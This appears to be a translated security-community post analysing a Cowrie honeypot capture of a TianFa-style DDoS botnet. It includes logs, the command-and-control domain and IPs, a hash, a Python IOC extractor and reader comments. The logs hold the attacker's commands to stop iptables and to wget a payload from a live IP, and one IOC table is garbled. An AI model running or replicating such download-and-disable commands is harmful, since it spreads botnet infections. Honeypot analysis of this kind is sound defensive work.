
Tags: I was attacked, Honeypot capture

Honeypot catches a botnet program: let the hackers get a taste of what a botnet feels like
w3bsafe35
2020-01-14 13:46:54

Background: the honeypot captured a botnet program. The log is as follows.

{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.529345Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.client.size","width":80,"height":24,"message":"Terminal Size: 80 24","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.760927Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.923410Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.input","input":"/etc/init.d/iptables stop","message":"CMD: /etc/init.d/iptables stop","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.979618Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.failed","input":"/etc/init.d/iptables stop","message":"Command not found: /etc/init.d/iptables stop","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:37.980430Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.command.input","input":"wget http://123.56.244.178:8080/LinuxTF","message":"CMD: wget http://123.56.244.178:8080/LinuxTF","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:58:41.968671Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","size":3557,"shasum":"5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","duplicate":true,"duration":42.07410550117493,"message":"Closing TTY Log: var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105 after 42 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.967740Z","src_ip":"112.30.132.7","session":"3ee826127229"}
{"eventid":"cowrie.session.closed","duration":57.2117645740509,"message":"Connection lost after 57 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.969413Z","src_ip":"112.30.132.7","session":"3ee826127229"}

Loading the sample into IDA reveals the domain of the botnet's master host.

songjing.123net.com, IP 123.56.244.178, hosted on Alibaba Cloud.

Port 8080 is the server the botnet downloads its payload from, running HFS (HTTP File Server), the standard setup for the DDoS kiddies.

Now a second look at the log:

{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","size":3557,"shasum":"5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105","duplicate":true,"duration":42.07410550117493,"message":"Closing TTY Log: var/lib/cowrie/tty/5cb80196d8cdc606421a436b25fadd8fdf3b8401d036b2385c404ee8d97be105 after 42 seconds","sensor":"cowrie-cowrie1","timestamp":"2020-01-11T23:59:19.967740Z","src_ip":"112.30.132.7","session":"3ee826127229"}

112.30.132.7 is the host the botnet uses for scanning, brute-forcing logins and uploading the payload, i.e. for recruiting new bots ("catching chickens").
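The Cowrie events quoted above already contain every indicator the post pulls out by hand: the attacking source IP, the credential pair that worked, the firewall-disabling command and the payload URL with its host and port. The following Python is an added example, not code from the post or from the Cowrie project. It reads Cowrie's JSON-lines output (the event names `cowrie.login.success`, `cowrie.command.input` and `cowrie.session.closed` are the real ones shown in the log above) and runs over a constructed copy of those events trimmed to the fields it needs; the evasion-command regex, the default-port table and the blocklist output format are choices made for this example.

```python
import json
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample input: the Cowrie JSON events quoted in the post, trimmed to
# the fields this extractor reads. A non-JSON line is included to show that the
# parser skips it instead of aborting.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.success","username":"root","password":"admin","src_ip":"112.30.132.7","session":"3ee826127229","timestamp":"2020-01-11T23:58:37.529345Z"}
{"eventid":"cowrie.command.input","input":"/etc/init.d/iptables stop","src_ip":"112.30.132.7","session":"3ee826127229","timestamp":"2020-01-11T23:58:37.979618Z"}
{"eventid":"cowrie.command.failed","input":"/etc/init.d/iptables stop","src_ip":"112.30.132.7","session":"3ee826127229","timestamp":"2020-01-11T23:58:37.980430Z"}
{"eventid":"cowrie.command.input","input":"wget http://123.56.244.178:8080/LinuxTF","src_ip":"112.30.132.7","session":"3ee826127229","timestamp":"2020-01-11T23:58:41.968671Z"}
{"eventid":"cowrie.session.closed","duration":57.2117645740509,"src_ip":"112.30.132.7","session":"3ee826127229","timestamp":"2020-01-11T23:59:19.969413Z"}
this line is not JSON and must be skipped
"""

# URLs handed to wget/curl/tftp etc. inside a captured command line.
URL_RE = re.compile(r"""(?:https?|ftp|tftp)://[^\s;|&'"<>]+""")

# Host-firewall / SELinux disabling, the usual first command in these scripts
# (pattern chosen for this example; tune it to your own telemetry).
EVASION_RE = re.compile(
    r"(?:iptables|firewalld|ufw)\b.*(?:\bstop\b|\bdisable\b|\s-F\b)|setenforce\s+0"
)

# Assumed default ports for URLs that carry no explicit port.
DEFAULT_PORTS = {"http": 80, "https": 443, "ftp": 21, "tftp": 69}


def parse_events(text):
    """Parse Cowrie JSON-lines output, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue
    return events


def extract_iocs(events):
    """Collect indicators from the parsed events."""
    iocs = {
        "attacker_ips": set(),           # every src_ip seen
        "credentials": set(),            # (username, password) pairs that logged in
        "download_urls": set(),          # payload URLs found in commands
        "payload_hosts": set(),          # (host, port) of the download servers
        "evasion_commands": [],          # firewall/SELinux disabling commands
        "sessions": defaultdict(list),   # session id -> commands in order
    }
    for ev in events:
        eid = ev.get("eventid", "")
        if ev.get("src_ip"):
            iocs["attacker_ips"].add(ev["src_ip"])
        if eid == "cowrie.login.success":
            iocs["credentials"].add((ev.get("username"), ev.get("password")))
        elif eid == "cowrie.command.input":
            cmd = ev.get("input", "")
            iocs["sessions"][ev.get("session")].append(cmd)
            for url in URL_RE.findall(cmd):
                iocs["download_urls"].add(url)
                parsed = urlparse(url)
                port = parsed.port or DEFAULT_PORTS.get(parsed.scheme, 0)
                iocs["payload_hosts"].add((parsed.hostname, port))
            if EVASION_RE.search(cmd):
                iocs["evasion_commands"].append(cmd)
    return iocs


def as_blocklist(iocs):
    """Render the indicators as sorted text lines for a firewall or IDS list."""
    lines = [f"ip {ip}" for ip in sorted(iocs["attacker_ips"])]
    lines += [f"host {host}:{port}" for host, port in sorted(iocs["payload_hosts"])]
    lines += [f"url {url}" for url in sorted(iocs["download_urls"])]
    return lines


if __name__ == "__main__":
    found = extract_iocs(parse_events(SAMPLE_LOG))
    print("credentials:", sorted(found["credentials"]))
    print("evasion:", found["evasion_commands"])
    for sid, cmds in found["sessions"].items():
        print(f"session {sid}:", " ; ".join(cmds))
    print("\n".join(as_blocklist(found)))
```

On the sample this yields the same two indicators the post identifies, 112.30.132.7 as the scanning/brute-force host and 123.56.244.178:8080 as the payload server, plus the root/admin credential pair and the `iptables stop` attempt as a defense-evasion marker. Running it over a full `cowrie.json` gives a per-session command timeline and a blocklist that can be diffed day to day.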

Fighting poison with poison, so that other machines on the public Internet do not become victims.

Threat indicators (IOC)

IP              Ports  Domains  Samples  Tags
112.30.132.7    0      0        0        0
123.56.244.178  0      4        0        3

Domain               Subdomains / Historical IPs / Samples / Tags
songjing.123net.com  171000 (the four counts were fused during extraction; the column boundaries are not recoverable)

Hash                                                              Detection  Samples  Tags
687b2778fe7ed72f26b08abcc15462065947d99135d911c144ac88f29fa59069  8/24       0        0

Comments

Anonymous user
2020-01-17 20:34:56
Nice, nice.

Anonymous user
2020-01-15 10:36:05
TianFa (天罚) DDoS, widely used by small-time domestic hackers.

1行
2020-01-14 15:49:54
Looks like a domestic command-and-control server, the TianFa (天罚) one.

Anonymous user
2020-01-14 14:29:41
123nat.com, haha. 123net got caught in the crossfire for no reason.

w3bsafe35
2020-01-14 15:21:16
Reply to @Anonymous user: A slip of the pen, I did not get it wrong. If I had gotten it wrong it would be more than embarrassing.

Anonymous user
2020-01-14 14:23:25
That domain name is written wrong.

w3bsafe35
2020-01-14 15:20:21
Reply to @Anonymous user: Embarrassing.